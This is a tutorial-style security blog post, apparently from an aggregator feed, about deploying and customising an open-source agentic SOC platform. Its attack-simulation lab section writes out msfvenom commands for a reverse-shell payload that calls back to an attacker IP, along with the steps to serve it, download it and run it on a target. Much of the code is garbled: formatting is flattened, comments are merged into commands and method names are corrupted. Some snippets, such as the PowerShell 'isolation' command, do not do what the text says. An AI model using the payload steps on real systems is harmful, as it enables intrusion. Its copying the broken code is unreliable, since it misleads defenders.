Listen to this Post

Introduction:
The security operations center (SOC) is drowning in alerts. Traditional SIEM and SOAR platforms, while powerful, still rely heavily on manual triage and rigid playbooks that break the moment an attacker deviates from the script. The Agentic SOC Platform by FunnyWolf is an open-source, agent-centric system that replaces static automation with autonomous AI agents, bringing the power of local LLMs like Ollama and enterprise-grade orchestration directly into your environment.
Learning Objectives:
- Objective 1: Understand the core architecture of an agentic SOC, from SIEM integration to automated playbook execution.
- Objective 2: Learn how to deploy and configure the Agentic SOC Platform using Docker and Redis Stream for real-time alert processing.
- Objective 3: Master the creation of custom AI agents and security playbooks using LangGraph and Python to automate incident response.
You Should Know:
- Architecture Deep Dive: From SIEM to Autonomous Action
The Agentic SOC Platform (ASP) revolutionizes security operations by replacing rigid playbooks with adaptive AI agents. Instead of following a static checklist, ASP’s agents perceive, reason, and act in real-time, operating on a modified OODA loop (Observe-Orient-Decide-Act). The system ingests alerts from any SIEM (Splunk, Kibana, Wazuh) via a Webhook Forwarder, pushing them into a Redis Stream for persistent queuing. From there, the ModuleEngine consumes these alerts, utilizing pre-built AI agents (LangGraph/Dify) to analyze, enrich, and decide on the correct course of action. Finally, the SIRP Platform creates or updates cases, while the PlaybookLoader executes automated responses like containment or threat intel gathering. This architecture is not just faster; it’s a paradigm shift from “if-this-then-that” to goal-driven, autonomous security.
2. Hands-On Deployment: Building Your AI SOC Lab
To get your hands dirty, you’ll deploy ASP locally. This ensures total data control, a critical requirement for enterprises subject to GDPR or HIPAA. Begin by cloning the repository and setting up the environment:
Clone the repository git clone https://github.com/FunnyWolf/agentic-soc-platform.git cd agentic-soc-platform Set up a Python virtual environment (3.9 to 3.12) python -m venv venv source venv/bin/activate On Windows use: venv\Scripts\activate Install dependencies pip install -r requirements.txt Configure your local LLM (e.g., using Ollama) ollama pull mistral or any model of your choice Configure the LLM endpoint in the ASP configuration files
Next, spin up the supporting infrastructure using Docker:
Start Redis for stream queuing docker run -d --name redis-stack -p 6379:6379 redis/redis-stack:latest Start the ASP webhook receiver and API (example command) python manage.py runserver
Once running, configure your SIEM (e.g., Splunk) to forward alerts to `http://localhost:5000/webhook/alert`. ASP will now automatically start ingesting and analyzing alerts.
3. Creating Your First Autonomous Agent
The magic of ASP lies in its modular agents. You can create a custom threat-hunting agent using LangGraph templates. Here’s a simplified Python example that enriches an IP address with threat intelligence:
from langgraph.graph import StateGraph
from agents.base import SecurityAgent
class ThreatIntelAgent(SecurityAgent):
def <strong>init</strong>(self):
super().<strong>init</strong>(name="ThreatIntel")
self.graph = StateGraph(dict)
def analyze(self, alert):
ip = alert['source_ip']
Query VirusTotal or another TI source
ti_result = query_virustotal(ip)
Autonomous decision: if malicious, trigger playbook
if ti_result['malicious']:
self.trigger_playbook('contain_ip', {'ip': ip})
return ti_result
This agent doesn’t just fetch data; it makes a decision and initiates a response—exactly what an analyst would do.
4. Advanced SOAR Playbook Automation
While ASP supports agentic workflows, it also allows for traditional playbooks for repeatable tasks. Playbooks are triggered via the SIRP UI and can be written in Python. Here’s a Windows PowerShell command you can integrate into a playbook to isolate a compromised host:
Remote isolation via PowerShell $Computer = "COMPROMISED-PC" Set-NetFirewallRule -DisplayGroup "Remote Desktop" -Enabled False Restart-Service -Name "RemoteAccess" -ComputerName $Computer
Alternatively, for Linux systems, a playbook might use SSH to revoke network access:
Revoke network access on Linux ssh security@$HOST_IP "sudo iptables -A INPUT -s $ATTACKER_IP -j DROP"
5. Integrating Threat Intelligence Feeds
Enhance detection by integrating MISP or AlienVault OTX. Use the following Linux command to pull the latest threat feed and feed it into ASP’s Redis Stream for processing:
Download and parse threat feed (example with MISP) curl -X GET "https://your-misp-server/attributes/download" -H "Authorization: YOUR_API_KEY" -o threat_feed.json jq '.response.Attribute[] | .value' threat_feed.json > iocs.txt Push IOCs into Redis for processing cat iocs.txt | while read line; do redis-cli xadd THREAT_FEED value $line; done
6. Cloud Hardening & API Security
Deploying ASP in a cloud environment (AWS, Azure, GCP) requires hardening. Implement these mitigations:
– API Rate Limiting: Configure the FastAPI backend to prevent abuse.
– Secrets Management: Never hardcode API keys. Use environment variables or a vault.
Set environment variables in Linux export ASP_SECRET_KEY="your_super_secret_key" export SIEM_WEBHOOK_TOKEN="secure_token_here"
– Network Segmentation: Use Kubernetes network policies to isolate agent pods.
Example Kubernetes network policy apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: asp-isolation spec: podSelector: matchLabels: app: asp-agent policyTypes: - Ingress - Egress
7. Vulnerability Exploitation & Mitigation Lab
To truly understand ASP’s value, set up a simple lab to simulate an attack. Use Metasploit to generate a reverse shell, then watch ASP’s agents automatically detect and respond.
On the attacker machine (Kali Linux): msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf python -m http.server 8080 On the victim (target Linux): wget http://192.168.1.100:8080/shell.elf chmod +x shell.elf ./shell.elf
With ASP configured, the agent will detect the anomalous process creation, correlate the outbound connection, and automatically trigger a playbook to kill the process and block the IP:
ASP Agent's automatic response (simplified) def respond_to_reverse_shell(process_id, attacker_ip): subprocess.run(["kill", "-9", str(process_id)]) subprocess.run(["iptables", "-A", "INPUT", "-s", attacker_ip, "-j", "DROP"]) return "Threat contained."
What Undercode Say:
- Key Takeaway 1: Agentic AI transforms SOCs from reactive to proactive, but success hinges on integrating local LLMs to maintain data sovereignty—a major advantage over cloud-only solutions.
- Key Takeaway 2: The platform’s modular Python-based architecture lowers the barrier to entry for blue teams, enabling them to customize agents without waiting for vendor updates.
Prediction:
By 2027, agentic AI platforms like this will be the baseline for SOC operations, reducing mean time to respond (MTTR) from hours to seconds. Organizations that fail to adopt autonomous security agents will face an insurmountable talent gap, as their human analysts burn out on alert triage that machines can now handle. The open-source nature of this project signals a democratization of advanced defense, potentially outpacing proprietary, closed-box solutions that cannot adapt as quickly to novel threats.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Camilajones – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


